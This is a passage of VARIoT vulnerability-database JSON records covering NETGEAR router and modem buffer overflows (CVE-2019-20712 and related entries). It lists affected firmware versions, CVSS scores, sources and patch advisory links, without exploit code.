"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"date": "2020-04-16T19:15:23.947000",
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-61054"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015466"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1284"
},
{
"date": "2024-11-21T04:39:07",
"db": "NVD",
"id": "CVE-2019-20700"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Out-of-bounds write vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015466"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1284"
}
],
"trust": 0.6
}
}
var-202004-0774
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250 is a wireless router of NETGEAR. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. The attacker The vulnerability can be exploited to cause buffer overflow or heap overflow
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0774",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.6"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.4"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.9.60"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.53"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.56"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "d6220",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "d6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "d7000",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.53"
},
{
"model": "d8500",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "dgn2200",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200b",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "r6250",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "r6300",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6400",
"scope": "eq",
"trust": 0.8,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.110"
},
{
"model": "dgnd2200bv4",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.109"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.2.0.56"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "r6300v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.0.53"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 0.6,
"vendor": "netgear",
"version": "1.0.1.24"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:netgear:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d6400_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d7000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:d8500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgn2200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:dgnd2200b_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:netgear:r6400_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Wayne Low of Fortinets FortiGuard Labs",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
}
],
"trust": 0.6
},
"cve": "CVE-2019-20712",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CVE-2019-20712",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.2,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2019-015467",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 5.1,
"id": "CNVD-2020-30683",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20712",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 0.9,
"id": "CVE-2019-20712",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.8,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2019-015467",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-20712",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cve@mitre.org",
"id": "CVE-2019-20712",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2019-015467",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-30683",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-1296",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR R6250 is a wireless router of NETGEAR. The vulnerability stems from the fact that the network system or product performs an operation on the memory, and the data boundary is not correctly verified, resulting in an incorrect read and write operation to other associated memory locations. The attacker The vulnerability can be exploited to cause buffer overflow or heap overflow",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-20712"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNVD",
"id": "CNVD-2020-30683"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-20712",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-30683",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"id": "VAR-202004-0774",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
}
],
"trust": 1.1038193114814814
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
}
]
},
"last_update_date": "2024-11-23T23:01:25.002000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory for Post-Authentication Buffer Overflow on Some Routers and Gateways, PSV-2018-0323",
"trust": 0.8,
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
},
{
"title": "Patch for Multiple NETGEAR product buffer overflow vulnerabilities (CNVD-2020-30683)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/219491"
},
{
"title": "Multiple NETGEAR Product Buffer Error Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=114793"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20712"
},
{
"trust": 1.6,
"url": "https://kb.netgear.com/000061216/security-advisory-for-post-authentication-buffer-overflow-on-some-routers-and-gateways-psv-2018-0323"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-20712"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"date": "2020-04-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"date": "2020-04-16T19:15:24.667000",
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-30683"
},
{
"date": "2020-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-015467"
},
{
"date": "2020-04-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202004-1296"
},
{
"date": "2024-11-21T04:39:08.740000",
"db": "NVD",
"id": "CVE-2019-20712"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural NETGEAR Classic buffer overflow vulnerability in device",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-015467"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202004-1296"
}
],
"trust": 0.6
}
}
var-202004-0754
Vulnerability from variot
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864. plural NETGEAR A classic buffer overflow vulnerability exists on the device.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. NETGEAR D6220, etc. are all products of NETGEAR. NETGEAR D6220 is a wireless modem. NETGEAR R6300 is a wireless router. NETGEAR EX3700 is a wireless network signal extender. The vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in incorrect read and write operations to other associated memory locations. This affects D6220 prior to 1.0.0.40, D8500 prior to 1.0.3.39, EX3700 prior to 1.0.0.70, EX3800 prior to 1.0.0.70, EX6000 prior to 1.0.0.30, EX6100 prior to 1.0.2.22, EX6120 prior to 1.0.0.40, EX6130 prior to 1.0.0.22, EX6150v1 prior to 1.0.0.42, EX6200 prior to 1.0.3.88, EX7000 prior to 1.0.0.66, R6300v2 prior to 1.0.4.18, R6400 prior to 1.0.1.24, R6400v2 prior to 1.0.2.32, R6700 prior to 1.0.1.22, R6700v3 prior to 1.0.2.32, R6900 prior to 1.0.1.22, R7000 prior to 1.0.9.6, R6900P prior to 1.0.0.56, R7000P prior to 1.0.0.56, R7100LG prior to 1.0.0.42, R7300DST prior to 1.0.0.54, R7900 prior to 1.0.1.26, R8300 prior to 1.0.2.106, R8500 prior to 1.0.2.106, WN2500RPv2 prior to 1.0.1.54, and WNR3500Lv2 prior to 1.2.0.46
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-0754",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r7900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.2.106"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.24"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.30"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.6,
"vendor": "netgear",
